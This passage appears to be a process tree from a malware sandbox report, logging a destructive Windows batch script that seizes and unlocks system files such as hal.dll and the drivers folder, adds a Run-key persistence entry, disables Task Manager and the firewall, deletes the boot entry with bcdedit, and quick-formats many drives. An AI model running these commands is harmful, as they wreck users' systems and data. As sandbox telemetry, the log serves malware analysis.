  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      PID:5448
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:5788
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      PID:5712
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:5332
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:4528
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6424
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6548
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:6708
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:7928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:8052
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:8080
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:8128
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      PID:4764
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:6924
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8364
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8468
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8504
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8564
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8604
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8660
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8696
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8800
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:9024
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:9068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:9148
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:9188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:8232
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:3820
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers" /r
      4⤵
      PID:8716
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\drivers" /reset /t /c /q
      4⤵
      Possible privilege escalation attempt
      PID:9460
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
      4⤵
      PID:9772
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:9336
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9464
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:9680
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:10324
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:10376
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:10452
  - - C:\Windows\system32\format.com
      format /y /q A:
      4⤵
      PID:10592
  - - C:\Windows\system32\format.com
      format /y /q B:
      4⤵
      PID:11100
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3080
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    PID:3120
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    PID:3336
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    PID:3436
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3484
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3492
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3512
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3524
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3540
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3556
- - C:\Windows\system32\format.com
    format /y /q A:
    3⤵
    PID:3628
- - C:\Windows\system32\format.com
    format /y /q B:
    3⤵
    PID:4048
- - C:\Windows\system32\format.com
    format /y /q D:
    3⤵
    PID:3564
- - C:\Windows\system32\format.com
    format /y /q E:
    3⤵
    PID:3608
- - C:\Windows\system32\format.com
    format /y /q F:
    3⤵
    PID:3192
- - C:\Windows\system32\format.com
    format /y /q G:
    3⤵
    PID:4504
- - C:\Windows\system32\format.com
    format /y /q H:
    3⤵
    PID:4680
- - C:\Windows\system32\format.com
    format /y /q I:
    3⤵
    PID:5040
- - C:\Windows\system32\format.com
    format /y /q J:
    3⤵
    PID:5008
- - C:\Windows\system32\format.com
    format /y /q K:
    3⤵
    PID:5520
- - C:\Windows\system32\format.com
    format /y /q L:
    3⤵
    PID:5188
- - C:\Windows\system32\format.com
    format /y /q M:
    3⤵
    PID:6096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:4672
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:7984
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:8532
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:9040
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:8404
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      PID:10080
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:7176
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:12120
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:6132
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:6636
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:8904
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:8036
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      PID:9516
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:8312
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:10244
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:12136
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:5264
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:3884
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:8432
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:8792
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:8904
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:9896
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      PID:9220
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:12128
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5760
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\psisrndr.ax"
    3⤵
    - Modifies file permissions
    PID:5568
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\psisrndr.ax" /reset /c /q
    3⤵
    PID:5152
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\psisrndr.ax"
    3⤵
    PID:4252
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\VBICodec.ax"
    3⤵
    PID:6368
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\VBICodec.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:7004
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\VBICodec.ax"
    3⤵
    - Views/modifies file attributes
    PID:6752
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vbisurf.ax"
    3⤵
    PID:7696
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vbisurf.ax" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:7436
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vbisurf.ax"
    3⤵
    PID:8132
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\vidcap.ax"
    3⤵
    PID:9120
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\vidcap.ax" /reset /c /q
    3⤵
    PID:10876
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\vidcap.ax"
    3⤵
    PID:11392
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
  2⤵
  PID:2760
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    PID:1972
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Views/modifies file attributes
    PID:2716
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\Twain_32.dll"
    3⤵
    - Possible privilege escalation attempt
    PID:2472
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\Twain_32.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1420
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\Twain_32.dll"
    3⤵
    - Views/modifies file attributes
    PID:592
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
    3⤵
    PID:2328
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:2692
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2236
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1956
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1348
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    PID:2704
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      PID:4024
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:1840
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:2568
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    PID:3140
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3948
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4088
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1056
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:296
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3016
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3116
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2948
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3144
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:3380
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:3616
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4444
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:4968
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:2648
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Modifies file permissions
      PID:5332
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:2128
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:1292
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:6208
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:6376
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:7216
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:7640
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:7972
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:8860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:8728
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:8616
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:9240
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      Views/modifies file attributes
      PID:10648
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:10540
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11456
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11516
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11592
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11624
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11700
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11784
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11856
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11908
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:12048
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:12072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:12112
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:12164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:12192
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:12232
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:3956
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:5824
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4940
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      Views/modifies file attributes
      PID:5296
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      PID:5264
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Possible privilege escalation attempt
      PID:5824
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      PID:6120
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:6088
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:5304
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6588
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6728
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:6976
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:6616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:4456
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:6672
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:3828
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      Views/modifies file attributes
      PID:5412
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:6928
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8756
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8852
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8872
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8964
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9012
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:7888
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:7996
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:8736
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:8780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:9232
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:9288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:9376
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:9400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:9444
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:9500
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers" /r
      4⤵
      PID:9584
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\drivers" /reset /t /c /q
      4⤵
      PID:10088
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
      4⤵
      Views/modifies file attributes
      PID:8312
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:10980
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:10996
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11012
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11052
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11076
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11144
  - - C:\Windows\system32\format.com
      format /y /q A:
      4⤵
      PID:10428
  - - C:\Windows\system32\format.com
      format /y /q B:
      4⤵
      PID:12104
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
    3⤵
    PID:1960
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll"
      4⤵
      PID:5784
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /reset /c /q
      4⤵
      PID:4456
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\System32\hal.dll"
      4⤵
      PID:4992
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\Twain_32.dll"
      4⤵
      Possible privilege escalation attempt
      PID:6096
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\Twain_32.dll" /reset /c /q
      4⤵
      Modifies file permissions
      PID:5872
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h "C:\Windows\Twain_32.dll"
      4⤵
      Views/modifies file attributes
      PID:2520
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd" /f
      4⤵
      PID:5088
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32.dll, SwapMouseButton
      4⤵
      PID:6336
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6356
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:7428
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:7884
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:9096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K Taskdl.bat
      4⤵
      PID:8748
  - - C:\Windows\system32\wscript.exe
      WScript Informacion.vbs
      4⤵
      PID:8436
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:7856
  - - C:\Windows\system32\attrib.exe
      attrib -r -a -s -h *.*
      4⤵
      Views/modifies file attributes
      PID:7856
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11004
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:9132
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11320
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11360
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11384
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11420
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11464
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11488
  - - C:\Windows\system32\wscript.exe
      WScript ErrorCritico.vbs
      4⤵
      PID:11532
  - - C:\Windows\system32\wscript.exe
      WScript Advertencia.vbs
      4⤵
      PID:11600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:11692
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:11728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:11804
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:11864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.cmd"
      4⤵
      PID:11932
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:11952
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers" /r
      4⤵
      PID:12056
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1628
- - C:\Windows\system32\takeown.exe
